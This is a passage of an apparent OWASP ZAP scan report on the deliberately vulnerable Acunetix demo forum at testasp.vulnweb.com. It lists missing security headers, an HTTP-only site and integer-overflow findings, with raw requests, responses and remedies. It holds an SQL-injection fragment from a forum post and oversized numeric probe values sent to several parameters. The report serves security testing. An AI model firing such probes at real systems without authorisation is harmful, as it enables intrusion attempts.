3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| Instances | 238 |
| Solution |
Ensure that your web server, application server, load balancer, etc. is configured to set the Content-Security-Policy header, to achieve optimal browser support: "Content-Security-Policy" for Chrome 25+, Firefox 23+ and Safari 7+, "X-Content-Security-Policy" for Firefox 4.0+ and Internet Explorer 10+, and "X-WebKit-CSP" for Chrome 14+ and Safari 6+.
|
| Reference |
https://developer.mozilla.org/en-US/docs/Web/Security/CSP/Introducing_Content_Security_Policy
https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html http://www.w3.org/TR/CSP/ http://w3c.github.io/webappsec/specs/content-security-policy/csp-specification.dev.html http://www.html5rocks.com/en/tutorials/security/content-security-policy/ http://caniuse.com/#feat=contentsecuritypolicy http://content-security-policy.com/ |
| Tags |
OWASP_2021_A05
OWASP_2017_A06 |
| CWE Id | 693 |
| WASC Id | 15 |
| Plugin Id | 10038 |
|
Medium |
HTTP Only Site |
|---|---|
| Description |
The site is only served under HTTP and not HTTPS.
|
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 419 bytes. |
POST https://testasp.vulnweb.com:443/Login.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 14 bytes. |
HTTP/1.0 0
|
| Response Body - size: 0 bytes. |
|
| Instances | 1 |
| Solution |
Configure your web or application server to use SSL (https).
|
| Reference |
https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html
https://letsencrypt.org/ |
| Tags |
OWASP_2021_A05
WSTG-v42-SESS-02 OWASP_2017_A06 |
| CWE Id | 311 |
| WASC Id | 4 |
| Plugin Id | 10106 |
|
Medium |
Integer Overflow Error |
|---|---|
| Description |
An integer overflow condition exists when an integer, which has not been properly checked from the input stream is used within a compiled program.
|
| URL | http://testasp.vulnweb.com/showforum.asp?id=2 |
| Method | GET |
| Parameter | id |
| Attack | 14015854230104428975476704187582573163087583 |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 378 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=14015854230104428975476704187582573163087583 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:17:15 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | GET |
| Parameter | id |
| Attack | 42092583479860050530006819860521914811530366 |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 398 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=42092583479860050530006819860521914811530366 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:17:16 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Templatize.asp?item=html/about.html |
| Method | GET |
| Parameter | item |
| Attack | 12739993682371154771046579610015199110648055 |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 381 bytes. |
GET http://testasp.vulnweb.com/Templatize.asp?item=12739993682371154771046579610015199110648055 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:17:16 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | POST |
| Parameter | id |
| Attack | 64189414867252997932917917547395480555706927 |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 451 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=64189414867252997932917917547395480555706927 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:17:02 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| Instances | 4 |
| Solution |
Rewrite the background program using proper checking of the size of integer being input to prevent overflows and divide by 0 errors. This will require a recompile of the background executable.
|
| Reference | http://projects.webappsec.org/w/page/13246946/Integer%20Overflows |
| Tags |
OWASP_2021_A03
OWASP_2017_A01 |
| CWE Id | 190 |
| WASC Id | 3 |
| Plugin Id | 30003 |
|
Medium |
Missing Anti-clickjacking Header |
|---|---|
| Description |
The response does not include either Content-Security-Policy with 'frame-ancestors' directive or X-Frame-Options to protect against 'ClickJacking' attacks.
|
| URL | http://testasp.vulnweb.com |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 205 bytes. |
GET http://testasp.vulnweb.com HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:21 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>3/14/2022 7:22:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/ |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 206 bytes. |
GET http://testasp.vulnweb.com/ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=NJGCKBOCAAGEAOFIEAFFCFAM; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:20 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>3/14/2022 7:22:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Default.asp |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 309 bytes. |
GET http://testasp.vulnweb.com/Default.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>3/14/2022 7:22:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 334 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 3198 |
| Response Body - size: 3,198 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 3196 |
| Response Body - size: 3,196 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL 